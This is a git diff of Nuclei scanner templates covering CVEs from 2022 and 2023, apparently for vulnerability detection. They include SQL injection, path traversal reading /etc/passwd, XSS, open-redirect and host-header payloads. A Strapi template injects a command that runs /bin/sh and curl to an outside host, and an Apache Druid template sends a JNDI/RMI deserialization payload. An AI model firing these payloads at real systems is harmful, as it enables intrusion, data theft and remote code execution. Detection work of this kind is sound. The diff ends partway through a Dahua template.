cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: complete_online_job_search_system_project - product: complete_online_job_search_system - tags: cve,cve2022,sqli,jobsearch,complete_online_job_search_system_project -variables: - num: "999999999" - -http: - - method: GET - path: - - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+" - - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' -# digest: 4b0a00483046022100c34036939ef2413c02af88cb8e86ecd6b3be7f27866b7d0ca21d3b7a269e47a8022100cf88f059ea7f102348f18a69cc9b78e11fc69e56a09b123e5a590fee4b261619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-32018.yaml b/nuclei-templates/CVE-2022/cve-2022-32018.yaml new file mode 100644 index 0000000000..03f4f75f3c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32018.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-32018 + +info: + name: Complete Online Job Search System 1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-12.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32018 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32018 + cwe-id: CWE-89 + epss-score: 0.01426 + epss-percentile: 0.8625 + cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: complete_online_job_search_system_project + product: complete_online_job_search_system + tags: cve,cve2022,sqli,complete_online_job_search_system_project +variables: + num: "999999999" + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+" + + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' +# digest: 4a0a0047304502205ba4dd1e28ba762599b6a5ab360d76fec10ab36095eea39b5350f66c6ccfdd4a022100e512574c97e4dd07fb068fe1ad699e8401d927211f5932a38f70608192d06c77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-32026.yaml b/nuclei-templates/CVE-2022/cve-2022-32026.yaml new file mode 100644 index 0000000000..d770372ee9 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32026.yaml @@ -0,0 +1,63 @@ +id: CVE-2022-32026 + +info: + name: Car Rental Management System 1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32026 + cwe-id: CWE-89 + epss-score: 0.01426 + epss-percentile: 0.8625 + cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: car_rental_management_system_project + product: car_rental_management_system + shodan-query: http.html:"Car Rental Management System" + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project +variables: + num: "999999999" + +http: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1 + Host: {{Hostname}} + + skip-variables-check: true + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 +# digest: 490a0046304402202d8d1ce0a8afb0fd0d8764c020301f0bed489c76f1e00e810d5e77dcb9065adb0220745a0985676455f645e3f98ac502002ec5c0ee377c9822b23ec2081b0c2bfd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-32028.yaml b/nuclei-templates/CVE-2022/cve-2022-32028.yaml deleted file mode 100644 index bd9a8b794a..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32028.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2022-32028 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32028 - cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 - cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: car_rental_management_system_project - product: car_rental_management_system - shodan-query: http.html:"Car Rental Management System" - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project -variables: - num: "999999999" - -http: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 -# digest: 4b0a00483046022100df821f457de97d0880a4be9f79b9a08294cffaaf8b36b5f573415af2fcc073ec022100c1bf7e95967be2f3096198251b61f794654b302d661afc789ad82c93f886f2e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-32159.yaml b/nuclei-templates/CVE-2022/cve-2022-32159.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-32159.yaml rename to nuclei-templates/CVE-2022/cve-2022-32159.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-32409.yaml b/nuclei-templates/CVE-2022/cve-2022-32409.yaml new file mode 100644 index 0000000000..970cc96d0e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32409.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-32409 + +info: + name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion + author: pikpikcu + severity: critical + description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability. + reference: + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-32409 + cwe-id: CWE-22 + epss-score: 0.47251 + epss-percentile: 0.97372 + cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: softwarepublico + product: i3geo + shodan-query: http.html:"i3geo" + tags: cve2022,cve,i3geo,lfi,softwarepublico + +http: + - method: GET + path: + - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4a0a00473045022072e312e8df1571351e7a21ca6317934960724f0071495fe4169ca5b013300dcd022100cc5ac2a8a33a0acc037a5db55a65ebb9f5ae1937caac9aededb4a8a59ab3ec56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-32444.yaml b/nuclei-templates/CVE-2022/cve-2022-32444.yaml new file mode 100644 index 0000000000..c253fd2076 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32444.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-32444 + +info: + name: u5cms v8.3.5 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest patch or update to a version that has fixed this vulnerability. + reference: + - https://github.com/u5cms/u5cms/issues/50 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-32444 + cwe-id: CWE-601 + epss-score: 0.00237 + epss-percentile: 0.61804 + cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: yuba + product: u5cms + tags: cve,cve2022,redirect,u5cms,cms,yuba + +http: + - method: GET + path: + - '{{BaseURL}}/loginsave.php?u=http://interact.sh' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 490a00463044022000c92e83439d52928c125a5e3a681d990ad3013d222cf3bc564b4449423fba5f022009cc04dbd965463fcc3710361b4673c6cdb46578f0b0221f5f237c977a44f400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-33119.yaml b/nuclei-templates/CVE-2022/cve-2022-33119.yaml deleted file mode 100644 index c147ddcde0..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-33119.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: CVE-2022-33119 - -info: - name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software. - reference: - - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/badboycxcc/badboycxcc - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-33119 - cwe-id: CWE-79 - epss-score: 0.0157 - epss-percentile: 0.86981 - cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: nuuo - product: nvrsolo_firmware - shodan-query: http.html:"NVRsolo" - tags: cve,cve2022,nvrsolo,xss,nuuo - -http: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: "><script>alert(document.domain)</script><" - - language=en&user=user&pass=pass&submit=Login - - matchers: - - type: dsl - dsl: - - 'contains(header, "text/html")' - - 'status_code == 200' - - contains(body,'<script>alert(document.domain)</script><\"?cmd=') - condition: and -# digest: 4a0a00473045022100f0f38f1056959a80fda5a1d4ced07d7ae1ac102a7ba4c692c0b0150a62461f0502205b4da7a44c66b407918128ef1f68b82728505e5d40ef1467678a122bd7212b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-34046.yaml b/nuclei-templates/CVE-2022/cve-2022-34046.yaml deleted file mode 100644 index b1060a2f78..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-34046.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: CVE-2022-34046 - -info: - name: WAVLINK WN533A8 - Improper Access Control - author: For3stCo1d - severity: high - description: | - WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the entire network. - remediation: | - Apply the latest firmware update provided by the vendor to fix the access control issue. - reference: - - https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046 - - http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-34046 - - https://github.com/ARPSyndicate/cvemon - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-34046 - cwe-id: CWE-863 - epss-score: 0.14292 - epss-percentile: 0.95577 - cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wn533a8_firmware - shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,packetstorm,wavlink,router,exposure - -http: - - raw: - - | - GET /sysinit.shtml?r=52300 HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'var syspasswd="' - - '<title>APP' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - regex: - - 'syspasswd="(.+?)"' -# digest: 4a0a004730450220012d32e7af94355d9d79d3210f97d2bdf114e7d81c8a425f14611b6898afdcb2022100d2e6dd7fe5b5f462e9bccc0179f3417fa34f94d1006498add8171cba0ec4af4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-35416.yaml b/nuclei-templates/CVE-2022/cve-2022-35416.yaml new file mode 100644 index 0000000000..0db605cff6 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-35416.yaml @@ -0,0 +1,57 @@ +id: CVE-2022-35416 + +info: + name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting + author: 0x240x23elu + severity: medium + description: | + H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. + remediation: | + Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability. + reference: + - https://github.com/advisories/GHSA-9x76-78gc-r3m9 + - https://github.com/Docker-droid/H3C_SSL_VPN_XSS + - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/bughunter0xff/recon-scanner + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-35416 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36353 + cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: h3c + product: ssl_vpn + shodan-query: http.html_hash:510586239 + tags: cve,cve2022,xss,vpn,h3c + +http: + - raw: + - | + GET /wnm/login/login.json HTTP/1.1 + Host: {{Hostname}} + Cookie: svpnlang= + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a00473045022074bce49d1d622adb10be0856ef209bacb28fb427de7f38f426069ca664b036d9022100b2466c1b44507b4b58e6f7e6ee4ab7221f9307198493e54f23ca95f1fcfc9e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-36883.yaml b/nuclei-templates/CVE-2022/cve-2022-36883.yaml new file mode 100644 index 0000000000..4548af5cd1 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-36883.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-36883 + +info: + name: Jenkins Git <=4.11.3 - Missing Authorization + author: c-sh0 + severity: high + description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin. + remediation: | + Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability. + reference: + - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883 + - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 + - http://www.openwall.com/lists/oss-security/2022/07/27/1 + - https://github.com/StarCrossPortal/scalpel + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2022-36883 + cwe-id: CWE-862 + epss-score: 0.01328 + epss-percentile: 0.84605 + cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:* + metadata: + verified: true + max-request: 1 + vendor: jenkins + product: git + framework: jenkins + shodan-query: X-Jenkins + tags: cve,cve2022,jenkins,plugin,git,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "repository:" + - SCM API plugin + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100ac3853e5c0b1575adbb7b7ed2af7b72f43f114875211dd347e0293df556a12a602201f6215244b284d054336a4750c2340219ab9d9be367383ba0b171439c19ccd56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-22621.yaml b/nuclei-templates/CVE-2023/CVE-2023-22621.yaml new file mode 100644 index 0000000000..c854645f54 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-22621.yaml @@ -0,0 +1,157 @@ +id: CVE-2023-22621 + +info: + name: Strapi Versions <=4.5.5 - SSTI to Remote Code Execution + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Strapi through 4.5.5 allows authenticated Server-Side Template Injection (SSTI) that can be exploited to execute arbitrary code on the server. A remote attacker with access to the Strapi admin panel can inject a crafted payload that executes code on the server into an email template that bypasses the validation checks that should prevent code execution. + reference: + - https://github.com/strapi/strapi/releases + - https://github.com/sofianeelhor/CVE-2023-22621-POC + - https://github.com/strapi/security-patches + - https://github.com/ARPSyndicate/cvemon + - https://nvd.nist.gov/vuln/detail/CVE-2023-22621 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2023-22621 + cwe-id: CWE-74 + epss-score: 0.00654 + epss-percentile: 0.79886 + cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 4 + vendor: strapi + product: strapi + shodan-query: html:"Welcome to your Strapi app" + tags: cve,cve2023,strapi,ssti,rce,intrusive,authenticated + +flow: http(1) && http(2) && http(3) && http(4) + +variables: + email: "{{email}}" + password: "{{password}}" + address: "{{randstr}}@{{rand_base(5)}}.com" + +http: + - raw: + - | + POST /admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"email":"{{email}}","password":"{{password}}"} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "token","isActive")' + - 'contains(content_type, "application/json")' + condition: and + internal: true + + extractors: + - type: json + part: body + name: token + json: + - ".data.token" + internal: true + + - raw: + - | + PUT /users-permissions/advanced HTTP/1.1 + Host: {{Hostname}} + Authorization: Bearer {{token}} + Content-Type: application/json + + {"unique_email":true,"allow_register":true,"email_confirmation":true,"email_reset_password":null,"email_confirmation_redirection":"{{RootURL}}","default_role":"authenticated"} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "ok","true")' + - 'contains(content_type, "application/json")' + condition: and + internal: true + + - raw: + - | + PUT /users-permissions/email-templates HTTP/1.1 + Host: {{Hostname}} + Authorization: Bearer {{token}} + Content-Type: application/json + + { + "email-templates": { + "reset_password": { + "display": "Email.template.reset_password", + "icon": "sync", + "options": { + "from": { + "name": "Administration Panel", + "email": "no-reply@strapi.io" + }, + "response_email": "", + "object": "Reset password", + "message": "

    We heard that you lost your password. Sorry about that!

    \n\n

    But dont worry! You can use the following link to reset your password:

    \n

    <%= URL %>?code=<%= TOKEN %>

    \n\n

    Thanks.

    " + } + }, + "email_confirmation": { + "display": "Email.template.email_confirmation", + "icon": "check-square", + "options": { + "from": { + "name": "Administration Panel", + "email": "no-reply@strapi.io" + }, + "response_email": "", + "object": "Account confirmation", + "message": "<%= `${ process.binding('spawn_sync').spawn({\"file\":\"/bin/sh\",\"args\":[\"/bin/sh\",\"-c\",\"curl {{interactsh-url}}\"],\"stdio\":[{\"readable\":1,\"writable\":1,\"type\":\"pipe\"},{\"readable\":1,\"writable\":1,\"type\":\"pipe\"/*<>%=*/}]}).output }` %>\n\n

    <%= URL %>?confirmation=<%= CODE %>

    \n\n

    Thanks.

    " + } + } + } + } + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "ok","true")' + - 'contains(content_type, "application/json")' + condition: and + internal: true + + - raw: + - | + POST /api/auth/local/register HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "email": "{{address}}", + "username": "{{randstr_1}}", + "password": "{{randstr_2}}" + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - "ApplicationError" + + - type: word + part: content_type + words: + - application/json +# digest: 490a00463044022015f5720f84a02433cbd9f408c4d4447a0dc253b787d2b8cf37411452fea6bfd902202d898191b479959b2f0d434d05adfde0a2900eee43bb396889e87d7c7a3c64ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-24044.yaml b/nuclei-templates/CVE-2023/CVE-2023-24044.yaml deleted file mode 100644 index 0a2696716b..0000000000 --- a/nuclei-templates/CVE-2023/CVE-2023-24044.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2023-24044 - -info: - name: Plesk Obsidian - Host Header Injection - author: pikpikcu - severity: medium - description: | - A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-24044 - - https://portswigger.net/web-security/host-header/exploiting - - https://medium.com/@jetnipat.tho/cve-2023-24044-10e48ab940d8 - - https://gist.github.com/TJetnipat/02b3854543b7ec95d54a8de811f2e8ae - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2023-24044 - cwe-id: CWE-601 - metadata: - fofa-query: title="Plesk Obsidian" - shodan-query: title:"Plesk Obsidian" - verified: "true" - tags: cve,cve2023,header,injection,plesk,obsidian - -requests: - - method: GET - path: - - "{{BaseURL}}/login.php" - - headers: - Host: "evil.com" - - matchers-condition: and - matchers: - - type: word - part: location - words: - - 'https://evil.com/login_up.php' - - - type: status - status: - - 303 diff --git a/nuclei-templates/CVE-2023/CVE-2023-25194.yaml b/nuclei-templates/CVE-2023/CVE-2023-25194.yaml new file mode 100644 index 0000000000..344fe9f3b0 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-25194.yaml @@ -0,0 +1,99 @@ +id: CVE-2023-25194 + +info: + name: Apache Druid Kafka Connect - Remote Code Execution + author: j4vaovo + severity: high + description: | + The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 + - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 + - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce + - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html + - https://kafka.apache.org/cve-list + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-25194 + cwe-id: CWE-502 + epss-score: 0.91608 + epss-percentile: 0.98695 + cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: apache + product: kafka_connect + shodan-query: html:"Apache Druid" + tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast + +http: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type":"kafka", + "spec":{ + "type":"kafka", + "ioConfig":{ + "type":"kafka", + "consumerProperties":{ + "bootstrap.servers":"127.0.0.1:6666", + "sasl.mechanism":"SCRAM-SHA-256", + "security.protocol":"SASL_SSL", + "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" + }, + "topic":"test", + "useEarliestOffset":true, + "inputFormat":{ + "type":"regex", + "pattern":"([\\s\\S]*)", + "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", + "columns":[ + "raw" + ] + } + }, + "dataSchema":{ + "dataSource":"sample", + "timestampSpec":{ + "column":"!!!_no_such_column_!!!", + "missingValue":"1970-01-01T00:00:00Z" + }, + "dimensionsSpec":{ + + }, + "granularitySpec":{ + "rollup":false + } + }, + "tuningConfig":{ + "type":"kafka" + } + }, + "samplerConfig":{ + "numRows":500, + "timeoutMs":15000 + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - 'RecordSupplier' + + - type: status + status: + - 400 +# digest: 4a0a004730450220253e393d9460c536f32f54253122a4cbfbbb890af4cd35b91b95d10e1b94d6b8022100e0a025041c041e62a80292747511e4d1af8e4adbe51386321a14466077c090aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-3836.yaml b/nuclei-templates/CVE-2023/CVE-2023-3836.yaml deleted file mode 100644 index fa3aafbfe2..0000000000 --- a/nuclei-templates/CVE-2023/CVE-2023-3836.yaml +++ /dev/null @@ -1,68 +0,0 @@ -id: CVE-2023-3836 - -info: - name: Dahua Smart Park Management - Arbitrary File Upload - author: HuTa0 - severity: critical - description: | - Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, 